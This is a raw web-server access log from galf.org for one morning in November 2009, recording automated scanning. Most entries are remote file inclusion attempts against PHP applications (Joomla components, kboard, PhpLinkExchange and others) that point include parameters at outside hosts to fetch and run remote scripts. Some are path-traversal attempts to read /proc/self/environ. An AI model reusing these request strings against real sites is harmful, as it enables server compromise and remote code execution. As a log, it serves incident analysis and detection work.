210.205.6.233 - - [23/Nov/2009:04:49:29 -0800] "GET /logs/access_090803.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:49:29 -0800] "GET /logs/access_090824.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:04:50:05 -0800] "GET /skin/uks_%20gallery_v3010/write.php?dir=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:04:50:05 -0800] "GET /logs//skin/uks_%20gallery_v3010/write.php?dir=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:04:50:05 -0800] "GET /logs/access.log//skin/uks_%20gallery_v3010/write.php?dir=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:50:41 -0800] "GET /logs/access_090713.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:50:41 -0800] "GET /logs/access_090427.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:04:50:41 -0800] "GET /logs/access_090824.log//skin/uks_%20gallery_v3010/write.php?dir=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:51:24 -0800] "GET /logs/access_090720.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:51:24 -0800] "GET /logs/access_090803.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:52:38 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:52:38 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:52:38 -0800] "GET /logs/access_090803.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:52:38 -0800] "GET /logs/access_090824.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:53:54 -0800] "GET /logs/access_090713.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:53:59 -0800] "GET /logs/access_090427.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:17 -0800] "GET /logs/access_090622.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:17 -0800] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:17 -0800] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:19 -0800] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:19 -0800] "GET /logs/access_090622.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:55:20 -0800] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:04:55:30 -0800] "GET /logs//skin/uks_%20gallery_v2010/write.php?dir=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:04:55:30 -0800] "GET /logs/access_090817.log//skin/uks_%20gallery_v2010/write.php?dir=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.71.186.226 - - [23/Nov/2009:04:55:30 -0800] "GET /skin/uks_%20gallery_v2010/write.php?dir=http://203.252.233.173/bbs//skin/happycast_category_bluishgreen/idg1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:56:41 -0800] "GET /logs/access_090720.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [23/Nov/2009:04:56:41 -0800] "GET /logs/access_090803.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:57:06 -0800] "GET /logs/access_090921.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:04:57:27 -0800] "GET /logs/access_090921.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:04:59:40 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:04:59:40 -0800] "GET /logs/components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:04:59:40 -0800] "GET /logs/access_090810.log/components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:26 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:26 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:26 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:35 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:35 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:03:35 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:47 -0800] "GET /logs/access_090511.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:47 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:47 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:52 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:52 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.218.231.66 - - [23/Nov/2009:05:08:53 -0800] "GET /index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.218.231.66 - - [23/Nov/2009:05:08:53 -0800] "GET /logs/access_090622.log%20%20/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.218.231.66 - - [23/Nov/2009:05:08:53 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [23/Nov/2009:05:08:54 -0800] "GET /logs/access.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:05:11:01 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:05:11:33 -0800] "GET /logs/access_090817.log/setup.php?setup[use_category]=1&dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:05:11:33 -0800] "GET /setup.php?setup[use_category]=1&dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:05:11:33 -0800] "GET /logs/setup.php?setup[use_category]=1&dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:05:11:53 -0800] "GET /logs/access_090907.log/setup.php?setup[use_category]=1&dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs/access_090921.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs/access_090921.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:13:10 -0800] "GET /logs/access_090921.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:14:18 -0800] "GET /logs/access_090622.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:14:18 -0800] "GET /logs/access_090622.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:14:36 -0800] "GET /logs/access_090622.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:15:16 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:15:42 -0800] "GET /logs/access_090413.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.218.231.66 - - [23/Nov/2009:05:17:51 -0800] "GET /logs/access_090907.log/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:00 -0800] "GET /common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:00 -0800] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:00 -0800] "GET /logs//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:02 -0800] "GET /common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:03 -0800] "GET /logs//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:20:03 -0800] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:05:20:19 -0800] "GET /components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:05:20:19 -0800] "GET /logs/access_090810.log/components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.85.173.55 - - [23/Nov/2009:05:20:19 -0800] "GET /logs/components/com_freechat/chatwindow.php?uebergabe=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:21:14 -0800] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:21:27 -0800] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:05:24:34 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:05:24:34 -0800] "GET /logs/access_090622.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:27:21 -0800] "GET /logs//admin.php?include_path=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:27:21 -0800] "GET /logs/access_090713.log//admin.php?include_path=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:27:21 -0800] "GET /admin.php?include_path=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:27:21 -0800] "GET /logs/access_090330.log//admin.php?include_path=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:05:27:22 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:05:27:22 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.207.160.101 - - [23/Nov/2009:05:27:22 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.yourxxxsource.com/erotica/user1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.218.231.66 - - [23/Nov/2009:05:28:22 -0800] "GET /logs/access_090622.log/index2.php?x=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:30:24 -0800] "GET /logs/access_090921.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:30:28 -0800] "GET /logs/access_090921.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:30:58 -0800] "GET /logs/access_090622.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:30:58 -0800] "GET /logs/access_090622.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:31:23 -0800] "GET /logs/access_090921.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [23/Nov/2009:05:31:38 -0800] "GET /logs/access_090622.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:32:08 -0800] "GET /logs/access_090420.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:32:08 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:32:08 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:32:59 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:32:59 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:32:59 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.245.165.135 - - [23/Nov/2009:05:33:03 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.brvoice.com/suporte/create_one_yourself/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:05:33:26 -0800] "GET /logs/access_090427.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.117 - - [23/Nov/2009:05:34:39 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.115.117 - - [23/Nov/2009:05:34:40 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
122.199.140.158 - - [23/Nov/2009:05:35:30 -0800] "GET /logs/access_090525.log//registration_detailed.inc.php?mosConfig_absolute_path=http://schulen.eduhi.at/hsstmartin.m/icon/1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:06 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:06 -0800] "GET /logs/access_090511.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:06 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:11 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:12 -0800] "GET /logs/access_090511.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [23/Nov/2009:05:40:12 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
